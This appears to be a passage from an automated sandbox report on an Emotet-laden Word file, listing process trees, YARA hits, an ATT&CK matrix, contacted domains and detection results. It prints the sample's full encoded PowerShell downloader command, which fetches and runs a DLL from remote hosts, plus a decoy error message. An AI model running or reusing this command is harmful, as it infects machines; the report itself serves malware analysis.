ABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyStringJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyStringJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jqqmr\igpp.bdm',vHnBlDVDvGJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jqqmr\igpp.bdm',#1Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcA
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACJump to behavior
                      Source: rundll32.exe, 0000000A.00000002.2336510375.0000000000C20000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: rundll32.exe, 0000000A.00000002.2336510375.0000000000C20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: rundll32.exe, 0000000A.00000002.2336510375.0000000000C20000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000008.00000002.2113549024.0000000000190000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2123339355.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2336227694.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2123303691.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2101787109.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2336212841.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2101808244.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2337739921.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2114619642.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2113562513.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2102553232.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2123952907.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection112Masquerading11OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScripting22Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol4SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell2Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol15Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonScripting22Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information111Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 343450 Sample: INFO.doc Startdate: 23/01/2021 Architecture: WINDOWS Score: 100 52 Multi AV Scanner detection for domain / URL 2->52 54 Antivirus detection for URL or domain 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 12 other signatures 2->58 11 cmd.exe 2->11         started        14 WINWORD.EXE 293 26 2->14         started        process3 file4 60 Suspicious powershell command line found 11->60 62 Very long command line found 11->62 64 Encrypted powershell cmdline option found 11->64 17 powershell.exe 12 9 11->17         started        21 msg.exe 11->21         started        38 C:\Users\user\Desktop\~$INFO.doc, data 14->38 dropped signatures5 process6 dnsIp7 44 bimception.com 162.241.224.176, 443, 49169, 49170 UNIFIEDLAYER-AS-1US United States 17->44 46 bbjugueteria.com 162.241.60.240, 443, 49167, 49168 UNIFIEDLAYER-AS-1US United States 17->46 48 4 other IPs or domains 17->48 36 C:\Users\user\Snuvw2w\V4651pz\H64C.dll, data 17->36 dropped 23 rundll32.exe 17->23         started        file8 process9 process10 25 rundll32.exe 23->25         started        process11 27 rundll32.exe 2 25->27         started        signatures12 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->66 30 rundll32.exe 27->30         started        process13 process14 32 rundll32.exe 9 30->32         started        dnsIp15 40 69.38.130.14, 80 TWRS-NYCUS United States 32->40 42 195.159.28.230, 49173, 8080 ASN-CATCHCOMNO Norway 32->42 50 System process connects to network (likely due to code injection or exploit) 32->50 signatures16

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      INFO.doc33%VirustotalBrowse
                      INFO.doc38%MetadefenderBrowse
                      INFO.doc26%ReversingLabsDocument-Excel.Downloader.Heuristic

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      8.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.1d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.1b0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.1f0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.1f0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.2a0000.1.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
